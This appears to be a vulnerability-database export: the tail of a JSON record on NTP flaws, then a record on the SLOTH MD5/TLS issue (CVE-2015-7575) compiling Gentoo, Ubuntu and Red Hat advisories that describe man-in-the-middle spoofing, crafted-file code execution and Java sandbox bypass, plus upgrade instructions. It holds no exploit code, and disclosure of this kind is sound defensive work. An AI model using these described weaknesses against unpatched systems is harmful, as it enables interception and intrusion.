"trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989542" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory7.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7979" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1547" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1548" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2518" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3096-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4956" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0727" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4954" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.10" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4955" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.11" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.3" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1550" }, { "db": "BID", "id": "88261" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-1550" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1550" }, { "db": "BID", "id": "88261" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-1550" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-27T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-01-06T00:00:00", "db": "VULMON", "id": "CVE-2016-1550" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "88261" }, { "date": "2017-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "date": "2016-10-05T22:33:00", "db": "PACKETSTORM", "id": "138984" }, { "date": "2016-08-03T18:16:52", "db": "PACKETSTORM", "id": "138162" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-05-31T13:33:49", "db": "PACKETSTORM", "id": "137244" }, { "date": "2016-05-02T21:38:58", "db": "PACKETSTORM", "id": "136864" }, { "date": "2016-07-26T19:19:00", "db": "PACKETSTORM", "id": "138052" }, { "date": "2017-01-06T21:59:00.413000", "db": "NVD", "id": "CVE-2016-1550" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-28T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2021-06-10T00:00:00", "db": "VULMON", "id": "CVE-2016-1550" }, { "date": "2016-11-24T01:07:00", "db": "BID", "id": "88261" }, { "date": "2021-06-10T09:01:00", "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "date": "2021-11-17T22:15:48.047000", "db": "NVD", "id": "CVE-2016-1550" }, { "date": "2021-11-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP.org ntpd contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#718152" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-605" } ], "trust": 0.6 } }
var-201601-0016
Vulnerability from variot
Mozilla Network Security Services (NSS) before 3.20.2, as used in Mozilla Firefox before 43.0.2 and Firefox ESR 38.x before 38.5.2, does not reject MD5 signatures in Server Key Exchange messages in TLS 1.2 Handshake Protocol traffic, which makes it easier for man-in-the-middle attackers to spoof servers by triggering a collision. Mozilla Network Security Services is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks. This issue is fixed in: Firefox 43.0.2 Firefox ESR 38.5.2 Network Security Services 3.20.2.
Gentoo Linux Security Advisory GLSA 201701-46
https://security.gentoo.org/
Severity: Normal Title: Mozilla Network Security Service (NSS): Multiple vulnerabilities Date: January 19, 2017 Bugs: #550288, #571086, #604916 ID: 201701-46
Synopsis
Multiple vulnerabilities have been found in NSS, the worst of which could allow remote attackers to obtain access to private key information.
Background
The Mozilla Network Security Service (NSS) is a library implementing security features like SSL v.2/v.3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME and X.509 certificates.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/nss < 3.28 >= 3.28
Description
Multiple vulnerabilities have been discovered in NSS. Please review the CVE identifiers and technical papers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NSS users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/nss-3.28"
References
[ 1 ] CVE-2015-2721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2721 [ 2 ] CVE-2015-4000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000 [ 3 ] CVE-2015-7575 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7575 [ 4 ] CVE-2016-1938 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1938 [ 5 ] CVE-2016-5285 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5285 [ 6 ] CVE-2016-8635 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8635 [ 7 ] CVE-2016-9074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9074 [ 8 ] SLOTH Attack Technical Paper http://www.mitls.org/pages/attacks/SLOTH
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-46
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--IaUA2rjNRE1qkoRse7wxSpqjKrtacOEtO--
.
More information can be found at https://www.mitls.org/pages/attacks/SLOTH
For the oldstable distribution (wheezy), this problem has been fixed in version 2.12.20-8+deb7u5. 7) - x86_64
- Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-2884-1 February 01, 2016
openjdk-7 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in OpenJDK 7.
Software Description: - openjdk-7: Open Source Java implementation
Details:
Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity, and availability. (CVE-2016-0483, CVE-2016-0494)
A vulnerability was discovered in the OpenJDK JRE related to data integrity. (CVE-2016-0402)
It was discovered that OpenJDK 7 incorrectly allowed MD5 to be used for TLS connections. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to expose sensitive information. (CVE-2015-7575)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit this to expose sensitive data over the network. (CVE-2016-0448)
A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial of service. (CVE-2016-0466)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: icedtea-7-jre-jamvm 7u95-2.6.4-0ubuntu0.15.10.1 openjdk-7-jre 7u95-2.6.4-0ubuntu0.15.10.1 openjdk-7-jre-headless 7u95-2.6.4-0ubuntu0.15.10.1 openjdk-7-jre-lib 7u95-2.6.4-0ubuntu0.15.10.1 openjdk-7-jre-zero 7u95-2.6.4-0ubuntu0.15.10.1
Ubuntu 15.04: icedtea-7-jre-jamvm 7u95-2.6.4-0ubuntu0.15.04.1 openjdk-7-jre 7u95-2.6.4-0ubuntu0.15.04.1 openjdk-7-jre-headless 7u95-2.6.4-0ubuntu0.15.04.1 openjdk-7-jre-lib 7u95-2.6.4-0ubuntu0.15.04.1 openjdk-7-jre-zero 7u95-2.6.4-0ubuntu0.15.04.1
Ubuntu 14.04 LTS: icedtea-7-jre-jamvm 7u95-2.6.4-0ubuntu0.14.04.1 openjdk-7-jre 7u95-2.6.4-0ubuntu0.14.04.1 openjdk-7-jre-headless 7u95-2.6.4-0ubuntu0.14.04.1 openjdk-7-jre-lib 7u95-2.6.4-0ubuntu0.14.04.1 openjdk-7-jre-zero 7u95-2.6.4-0ubuntu0.14.04.1
This update uses a new upstream release, which includes additional bug fixes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-openjdk security update Advisory ID: RHSA-2016:0053-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0053.html Issue date: 2016-01-21 CVE Names: CVE-2015-4871 CVE-2015-7575 CVE-2016-0402 CVE-2016-0448 CVE-2016-0466 CVE-2016-0483 CVE-2016-0494 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
- Description:
The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions. (CVE-2016-0483)
An integer signedness issue was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions. (CVE-2016-0494)
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory. (CVE-2016-0466)
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client. (CVE-2015-7575)
Multiple flaws were discovered in the Libraries, Networking, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2015-4871, CVE-2016-0402, CVE-2016-0448)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
Note: This update also disallows the use of the MD5 hash algorithm in the certification path processing. The use of MD5 can be re-enabled by removing MD5 from the jdk.certpath.disabledAlgorithms security property defined in the java.security file.
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1273859 - CVE-2015-4871 OpenJDK: protected methods can be used as interface methods via DirectMethodHandle (Libraries) 1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH) 1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543) 1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054) 1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710) 1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962) 1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm
i386: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch: java-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm
i386: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.src.rpm
i386: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.i686.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.95-2.6.4.0.el6_7.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.el6_7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-4871 https://access.redhat.com/security/cve/CVE-2015-7575 https://access.redhat.com/security/cve/CVE-2016-0402 https://access.redhat.com/security/cve/CVE-2016-0448 https://access.redhat.com/security/cve/CVE-2016-0466 https://access.redhat.com/security/cve/CVE-2016-0483 https://access.redhat.com/security/cve/CVE-2016-0494 https://access.redhat.com/security/updates/classification/#critical
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWoM9KXlSAg2UNWIIRAqEwAJwN75xhk+4gvMxjiZkEfLqpUobNvACeLWha qzRinbbktNyylx3SPUV5yWA= =ZO8E -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
